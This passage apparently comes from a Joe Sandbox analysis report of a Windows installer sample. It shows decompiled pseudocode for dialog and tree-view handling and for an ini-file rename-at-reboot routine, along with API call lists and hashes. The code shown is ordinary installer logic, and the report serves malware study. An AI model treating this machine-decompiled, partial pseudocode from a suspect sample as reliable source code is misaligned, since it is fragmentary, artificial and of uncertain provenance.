                                                                        									if(_t293 <= 0) {
                                                                        										L74:
                                                                        										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                        										_a16 = _t293;
                                                                        										_a8 = 0x420;
                                                                        										goto L75;
                                                                        									} else {
                                                                        										goto L71;
                                                                        									}
                                                                        									do {
                                                                        										L71:
                                                                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                        											_t301 = _t301 + 1;
                                                                        										}
                                                                        										_t222 = _t222 + 1;
                                                                        									} while (_t222 < _t293);
                                                                        									goto L74;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                        							goto L93;
                                                                        						} else {
                                                                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                        							if(_t232 == 0xffffffff) {
                                                                        								goto L93;
                                                                        							}
                                                                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                        								_t294 = 0x20;
                                                                        							}
                                                                        							E00401299(_t294);
                                                                        							SendMessageW(_a4, 0x420, 0, _t294);
                                                                        							_a12 = _a12 | 0xffffffff;
                                                                        							_a16 = 0;
                                                                        							_a8 = 0x40f;
                                                                        							goto L56;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_v36 = 0;
                                                                        					_v20 = 2;
                                                                        					 *0x42a2c0 = _t291;
                                                                        					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                        					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                        					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                        					_t297 = _t258;
                                                                        					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                        					 *0x42372c = _t260;
                                                                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                        					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                        					}
                                                                        					DeleteObject(_t297);
                                                                        					_t298 = 0;
                                                                        					do {
                                                                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                        							if(_t298 != 0x20) {
                                                                        								_v20 = 0;
                                                                        							}
                                                                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                                        						}
                                                                        						_t298 = _t298 + 1;
                                                                        					} while (_t298 < 0x21);
                                                                        					_t299 = _a16;
                                                                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                        					_push(0x15);
                                                                        					E004045C4(_a4);
                                                                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                        					_push(0x16);
                                                                        					E004045C4(_a4);
                                                                        					_t300 = 0;
                                                                        					_v16 = 0;
                                                                        					if( *0x42a28c <= 0) {
                                                                        						L19:
                                                                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t319 = _v24 + 8;
                                                                        						_v32 = _t319;
                                                                        						do {
                                                                        							_t278 =  &(_t319[0x10]);
                                                                        							if( *_t278 != 0) {
                                                                        								_v64 = _t278;
                                                                        								_t279 =  *_t319;
                                                                        								_v88 = _v16;
                                                                        								_t311 = 0x20;
                                                                        								_v84 = 0xffff0002;
                                                                        								_v80 = 0xd;
                                                                        								_v68 = _t311;
                                                                        								_v44 = _t300;
                                                                        								_v72 = _t279 & _t311;
                                                                        								if((_t279 & 0x00000002) == 0) {
                                                                        									if((_t279 & 0x00000004) == 0) {
                                                                        										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                        									} else {
                                                                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                        									}
                                                                        								} else {
                                                                        									_v80 = 0x4d;
                                                                        									_v48 = 1;
                                                                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                        									_v36 = 1;
                                                                        									 *( *0x423740 + _t300 * 4) = _t284;
                                                                        									_v16 =  *( *0x423740 + _t300 * 4);
                                                                        								}
                                                                        							}
                                                                        							_t300 = _t300 + 1;
                                                                        							_t319 =  &(_v32[0x818]);
                                                                        							_v32 = _t319;
                                                                        						} while (_t300 <  *0x42a28c);
                                                                        						if(_v36 != 0) {
                                                                        							L20:
                                                                        							if(_v20 != 0) {
                                                                        								E004045F9(_v8);
                                                                        								goto L23;
                                                                        							} else {
                                                                        								ShowWindow(_v12, 5);
                                                                        								E004045F9(_v12);
                                                                        								L93:
                                                                        								return E0040462B(_a8, _a12, _a16);
                                                                        							}
                                                                        						}
                                                                        						goto L19;
                                                                        					}
                                                                        				}
                                                                        			}


























































                                                                        0x00405038
                                                                        0x00405051
                                                                        0x00405056
                                                                        0x0040505e
                                                                        0x00405064
                                                                        0x0040507a
                                                                        0x0040507d
                                                                        0x004052a8
                                                                        0x004052af
                                                                        0x004052c3
                                                                        0x004052b1
                                                                        0x004052b3
                                                                        0x004052b6
                                                                        0x004052b7
                                                                        0x004052be
                                                                        0x004052be
                                                                        0x004052cf
                                                                        0x004052dd
                                                                        0x004052e0
                                                                        0x004052f6
                                                                        0x0040536b
                                                                        0x0040536e
                                                                        0x00405370
                                                                        0x0040537a
                                                                        0x00405388
                                                                        0x00405388
                                                                        0x0040538a
                                                                        0x00405394
                                                                        0x0040539a
                                                                        0x0040539d
                                                                        0x004053a0
                                                                        0x004053bb
                                                                        0x004053a2
                                                                        0x004053ac
                                                                        0x004053ac
                                                                        0x004053a0
                                                                        0x00405394
                                                                        0x00000000
                                                                        0x0040536e
                                                                        0x004052fb
                                                                        0x00405306
                                                                        0x0040530b
                                                                        0x00405312
                                                                        0x00405317
                                                                        0x0040531b
                                                                        0x00405326
                                                                        0x00405326
                                                                        0x0040532a
                                                                        0x0040532e
                                                                        0x00405332
                                                                        0x00405345
                                                                        0x00405334
                                                                        0x00405334
                                                                        0x0040533b
                                                                        0x00405341
                                                                        0x0040533d
                                                                        0x0040533d
                                                                        0x0040533d
                                                                        0x0040533b
                                                                        0x00405349
                                                                        0x0040534b
                                                                        0x0040535e
                                                                        0x00405361
                                                                        0x00405364
                                                                        0x00405364
                                                                        0x0040532e
                                                                        0x00000000
                                                                        0x0040531b
                                                                        0x004052fd
                                                                        0x00405304
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004053be
                                                                        0x004053be
                                                                        0x004053c5
                                                                        0x00405436
                                                                        0x0040543e
                                                                        0x00405446
                                                                        0x00405446
                                                                        0x0040544f
                                                                        0x00405451
                                                                        0x00405458
                                                                        0x0040545b
                                                                        0x0040545b
                                                                        0x00405461
                                                                        0x00405468
                                                                        0x0040546b
                                                                        0x0040546b
                                                                        0x00405471
                                                                        0x00405477
                                                                        0x0040547d
                                                                        0x0040547d
                                                                        0x0040548a
                                                                        0x004055eb
                                                                        0x004055f2
                                                                        0x0040560f
                                                                        0x00405615
                                                                        0x00405627
                                                                        0x00405627
                                                                        0x00000000
                                                                        0x00405490
                                                                        0x00405492
                                                                        0x00405497
                                                                        0x0040549c
                                                                        0x004054a1
                                                                        0x004054a3
                                                                        0x004054a3
                                                                        0x004054a4
                                                                        0x004054a5
                                                                        0x004054a7
                                                                        0x004054a7
                                                                        0x004054af
                                                                        0x004054f0
                                                                        0x004054f2
                                                                        0x00405502
                                                                        0x00405505
                                                                        0x0040550a
                                                                        0x00405511
                                                                        0x00405514
                                                                        0x004055b6
                                                                        0x004055bf
                                                                        0x004055c7
                                                                        0x004055c7
                                                                        0x004055d5
                                                                        0x004055e6
                                                                        0x004055e6
                                                                        0x00000000
                                                                        0x004055d5
                                                                        0x0040551a
                                                                        0x0040551d
                                                                        0x00405523
                                                                        0x00405528
                                                                        0x0040552a
                                                                        0x0040552c
                                                                        0x00405532
                                                                        0x00405539
                                                                        0x0040553e
                                                                        0x00405545
                                                                        0x00405548
                                                                        0x00405548
                                                                        0x0040554f
                                                                        0x0040555b
                                                                        0x0040555f
                                                                        0x00405561
                                                                        0x00405561
                                                                        0x00405551
                                                                        0x00405553
                                                                        0x00405553
                                                                        0x00405581
                                                                        0x0040558d
                                                                        0x0040559c
                                                                        0x0040559c
                                                                        0x0040559e
                                                                        0x004055a1
                                                                        0x004055aa
                                                                        0x00000000
                                                                        0x004054b1
                                                                        0x004054bc
                                                                        0x004054bf
                                                                        0x004054c4
                                                                        0x004054c6
                                                                        0x004054ca
                                                                        0x004054da
                                                                        0x004054e4
                                                                        0x004054e6
                                                                        0x004054e9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004054cc
                                                                        0x004054cc
                                                                        0x004054d2
                                                                        0x004054d4
                                                                        0x004054d4
                                                                        0x004054d5
                                                                        0x004054d6
                                                                        0x00000000
                                                                        0x004054cc
                                                                        0x004054af
                                                                        0x0040548a
                                                                        0x004053cd
                                                                        0x00000000
                                                                        0x004053e3
                                                                        0x004053ed
                                                                        0x004053f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405404
                                                                        0x00405409
                                                                        0x00405415
                                                                        0x00405415
                                                                        0x00405417
                                                                        0x00405426
                                                                        0x00405428
                                                                        0x0040542c
                                                                        0x0040542f
                                                                        0x00000000
                                                                        0x0040542f
                                                                        0x004053cd
                                                                        0x00405083
                                                                        0x00405088
                                                                        0x00405091
                                                                        0x00405098
                                                                        0x004050aa
                                                                        0x004050b5
                                                                        0x004050bb
                                                                        0x004050c9
                                                                        0x004050dd
                                                                        0x004050e2
                                                                        0x004050ef
                                                                        0x004050f4
                                                                        0x0040510a
                                                                        0x0040511b
                                                                        0x00405128
                                                                        0x00405128
                                                                        0x0040512b
                                                                        0x00405131
                                                                        0x00405133
                                                                        0x00405136
                                                                        0x0040513b
                                                                        0x00405140
                                                                        0x00405142
                                                                        0x00405142
                                                                        0x00405162
                                                                        0x00405162
                                                                        0x00405164
                                                                        0x00405165
                                                                        0x0040516a
                                                                        0x00405170
                                                                        0x00405174
                                                                        0x00405179
                                                                        0x00405181
                                                                        0x00405185
                                                                        0x0040518a
                                                                        0x0040518f
                                                                        0x00405197
                                                                        0x0040519a
                                                                        0x0040526a
                                                                        0x0040527d
                                                                        0x00000000
                                                                        0x004051a0
                                                                        0x004051a3
                                                                        0x004051a6
                                                                        0x004051a9
                                                                        0x004051a9
                                                                        0x004051af
                                                                        0x004051b8
                                                                        0x004051bb
                                                                        0x004051bf
                                                                        0x004051c2
                                                                        0x004051c5
                                                                        0x004051ce
                                                                        0x004051d7
                                                                        0x004051da
                                                                        0x004051dd
                                                                        0x004051e0
                                                                        0x0040521e
                                                                        0x00405249
                                                                        0x00405220
                                                                        0x0040522f
                                                                        0x0040522f
                                                                        0x004051e2
                                                                        0x004051e5
                                                                        0x004051f3
                                                                        0x004051fd
                                                                        0x00405205
                                                                        0x0040520c
                                                                        0x00405217
                                                                        0x00405217
                                                                        0x004051e0
                                                                        0x0040524f
                                                                        0x00405250
                                                                        0x0040525c
                                                                        0x0040525c
                                                                        0x00405268
                                                                        0x00405283
                                                                        0x00405286
                                                                        0x004052a3
                                                                        0x00000000
                                                                        0x00405288
                                                                        0x0040528d
                                                                        0x00405296
                                                                        0x00405629
                                                                        0x0040563b
                                                                        0x0040563b
                                                                        0x00405286
                                                                        0x00000000
                                                                        0x00405268
                                                                        0x0040519a

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00405049
                                                                        • GetDlgItem.USER32 ref: 00405054
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                        • LoadImageW.USER32 ref: 004050B5
                                                                        • SetWindowLongW.USER32 ref: 004050CE
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                        • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                        • SetWindowLongW.USER32 ref: 0040527D
                                                                        • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                        • GlobalFree.KERNEL32 ref: 0040546B
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                        • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                        • GetDlgItem.USER32 ref: 00405620
                                                                        • ShowWindow.USER32(00000000), ref: 00405627
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 2564846305-813528018
                                                                        • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                        • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                        • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                        • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				void* _v16;
                                                                        				struct HWND__* _t56;
                                                                        				intOrPtr _t69;
                                                                        				signed int _t75;
                                                                        				signed short* _t76;
                                                                        				signed short* _t78;
                                                                        				long _t92;
                                                                        				int _t103;
                                                                        				signed int _t110;
                                                                        				intOrPtr _t113;
                                                                        				WCHAR* _t114;
                                                                        				signed int* _t116;
                                                                        				WCHAR* _t117;
                                                                        				struct HWND__* _t118;
                                                                        
                                                                        				if(_a8 != 0x110) {
                                                                        					if(_a8 != 0x111) {
                                                                        						L13:
                                                                        						if(_a8 != 0x4e) {
                                                                        							if(_a8 == 0x40b) {
                                                                        								 *0x421714 =  *0x421714 + 1;
                                                                        							}
                                                                        							L27:
                                                                        							_t114 = _a16;
                                                                        							L28:
                                                                        							return E0040462B(_a8, _a12, _t114);
                                                                        						}
                                                                        						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                        						_t114 = _a16;
                                                                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                        							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                        							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                        							_v12 = _t103;
                                                                        							_v16 = _t113;
                                                                        							_v8 = 0x428200;
                                                                        							if(_t103 - _t113 < 0x800) {
                                                                        								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                        								SetCursor(LoadCursorW(0, 0x7f02));
                                                                        								_push(1);
                                                                        								E00404A32(_a4, _v8);
                                                                        								SetCursor(LoadCursorW(0, 0x7f00));
                                                                        								_t114 = _a16;
                                                                        							}
                                                                        						}
                                                                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                        							goto L28;
                                                                        						} else {
                                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                        								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                        							}
                                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                        								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                        							}
                                                                        							return 1;
                                                                        						}
                                                                        					}
                                                                        					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                        						goto L27;
                                                                        					} else {
                                                                        						_t69 =  *0x422720; // 0x70d9dc
                                                                        						_t29 = _t69 + 0x14; // 0x70d9f0
                                                                        						_t116 = _t29;
                                                                        						if(( *_t116 & 0x00000020) == 0) {
                                                                        							goto L27;
                                                                        						}
                                                                        						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                        						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                        						E00404A0E();
                                                                        						goto L13;
                                                                        					}
                                                                        				}
                                                                        				_t117 = _a16;
                                                                        				_t75 =  *(_t117 + 0x30);
                                                                        				if(_t75 < 0) {
                                                                        					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                        				}
                                                                        				_t76 =  *0x42a298 + _t75 * 2;
                                                                        				_t110 =  *_t76 & 0x0000ffff;
                                                                        				_a8 = _t110;
                                                                        				_t78 =  &(_t76[1]);
                                                                        				_a16 = _t78;
                                                                        				_v16 = _t78;
                                                                        				_v12 = 0;
                                                                        				_v8 = E00404734;
                                                                        				if(_t110 != 2) {
                                                                        					_v8 = E004046FA;
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                        				_push(0x22);
                                                                        				E004045C4(_a4);
                                                                        				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                        				_push(0x23);
                                                                        				E004045C4(_a4);
                                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                        				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                        				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                        				E004045F9(_t118);
                                                                        				SendMessageW(_t118, 0x45b, 1, 0);
                                                                        				_t92 =  *( *0x42a270 + 0x68);
                                                                        				if(_t92 < 0) {
                                                                        					_t92 = GetSysColor( ~_t92);
                                                                        				}
                                                                        				SendMessageW(_t118, 0x443, 0, _t92);
                                                                        				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                        				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                        				 *0x421714 = 0;
                                                                        				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                        				 *0x421714 = 0;
                                                                        				return 0;
                                                                        			}



















                                                                        0x00404795
                                                                        0x004048c2
                                                                        0x0040491f
                                                                        0x00404923
                                                                        0x004049f0
                                                                        0x004049f2
                                                                        0x004049f2
                                                                        0x004049f8
                                                                        0x004049f8
                                                                        0x004049fb
                                                                        0x00000000
                                                                        0x00404a02
                                                                        0x00404931
                                                                        0x00404937
                                                                        0x00404941
                                                                        0x0040494c
                                                                        0x0040494f
                                                                        0x00404952
                                                                        0x0040495d
                                                                        0x00404960
                                                                        0x00404967
                                                                        0x00404974
                                                                        0x00404985
                                                                        0x0040498b
                                                                        0x00404993
                                                                        0x004049a1
                                                                        0x004049a7
                                                                        0x004049a7
                                                                        0x00404967
                                                                        0x004049b1
                                                                        0x00000000
                                                                        0x004049bc
                                                                        0x004049c0
                                                                        0x004049d0
                                                                        0x004049d0
                                                                        0x004049d6
                                                                        0x004049e2
                                                                        0x004049e2
                                                                        0x00000000
                                                                        0x004049e6
                                                                        0x004049b1
                                                                        0x004048cd
                                                                        0x00000000
                                                                        0x004048df
                                                                        0x004048df
                                                                        0x004048e4
                                                                        0x004048e4
                                                                        0x004048ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404913
                                                                        0x00404915
                                                                        0x0040491a
                                                                        0x00000000
                                                                        0x0040491a
                                                                        0x004048cd
                                                                        0x0040479b
                                                                        0x0040479e
                                                                        0x004047a3
                                                                        0x004047b4
                                                                        0x004047b4
                                                                        0x004047bc
                                                                        0x004047bf
                                                                        0x004047c3
                                                                        0x004047c6
                                                                        0x004047ca
                                                                        0x004047cd
                                                                        0x004047d0
                                                                        0x004047d3
                                                                        0x004047da
                                                                        0x004047dc
                                                                        0x004047dc
                                                                        0x004047e6
                                                                        0x004047f3
                                                                        0x004047fd
                                                                        0x00404802
                                                                        0x00404805
                                                                        0x0040480a
                                                                        0x00404821
                                                                        0x00404828
                                                                        0x0040483b
                                                                        0x0040483e
                                                                        0x00404852
                                                                        0x00404859
                                                                        0x0040485e
                                                                        0x00404863
                                                                        0x00404863
                                                                        0x00404871
                                                                        0x0040487f
                                                                        0x00404891
                                                                        0x00404896
                                                                        0x004048a6
                                                                        0x004048a8
                                                                        0x00000000

                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                        • GetDlgItem.USER32 ref: 00404835
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                        • GetSysColor.USER32(?), ref: 00404863
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                        • lstrlenW.KERNEL32(?), ref: 00404884
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                        • GetDlgItem.USER32 ref: 004048FF
                                                                        • SendMessageW.USER32(00000000), ref: 00404906
                                                                        • GetDlgItem.USER32 ref: 00404931
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                        • SetCursor.USER32(00000000), ref: 00404985
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                        • SetCursor.USER32(00000000), ref: 004049A1
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: Call$N
                                                                        • API String ID: 3103080414-3438112850
                                                                        • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                        • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                        • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                        • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004062AE(void* __ecx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				long _t12;
                                                                        				long _t24;
                                                                        				char* _t31;
                                                                        				int _t37;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t39;
                                                                        				long _t42;
                                                                        				WCHAR* _t44;
                                                                        				void* _t46;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        				void* _t52;
                                                                        				void* _t53;
                                                                        
                                                                        				_t38 = __ecx;
                                                                        				_t44 =  *(_t52 + 0x14);
                                                                        				 *0x426de8 = 0x55004e;
                                                                        				 *0x426dec = 0x4c;
                                                                        				if(_t44 == 0) {
                                                                        					L3:
                                                                        					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                        					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                        						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                        						_t53 = _t52 + 0x10;
                                                                        						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                                        						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                                        						_t48 = _t12;
                                                                        						 *(_t53 + 0x18) = _t48;
                                                                        						if(_t48 != 0xffffffff) {
                                                                        							_t42 = GetFileSize(_t48, 0);
                                                                        							_t6 = _t37 + 0xa; // 0xa
                                                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                        							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                                        								L18:
                                                                        								return CloseHandle(_t48);
                                                                        							} else {
                                                                        								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                        									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                                        									if(_t49 == 0) {
                                                                        										_t48 =  *(_t53 + 0x18);
                                                                        										L16:
                                                                        										_t24 = _t42;
                                                                        										L17:
                                                                        										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                                        										SetFilePointer(_t48, 0, 0, 0);
                                                                        										E0040620A(_t48, _t46, _t42 + _t37);
                                                                        										GlobalFree(_t46);
                                                                        										goto L18;
                                                                        									}
                                                                        									_t39 = _t46 + _t42;
                                                                        									_t31 = _t39 + _t37;
                                                                        									while(_t39 > _t49) {
                                                                        										 *_t31 =  *_t39;
                                                                        										_t31 = _t31 - 1;
                                                                        										_t39 = _t39 - 1;
                                                                        									}
                                                                        									_t24 = _t49 - _t46 + 1;
                                                                        									_t48 =  *(_t53 + 0x18);
                                                                        									goto L17;
                                                                        								}
                                                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                        								_t42 = _t42 + 0xa;
                                                                        								goto L16;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					CloseHandle(E00406158(_t44, 0, 1));
                                                                        					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                        						goto L3;
                                                                        					}
                                                                        				}
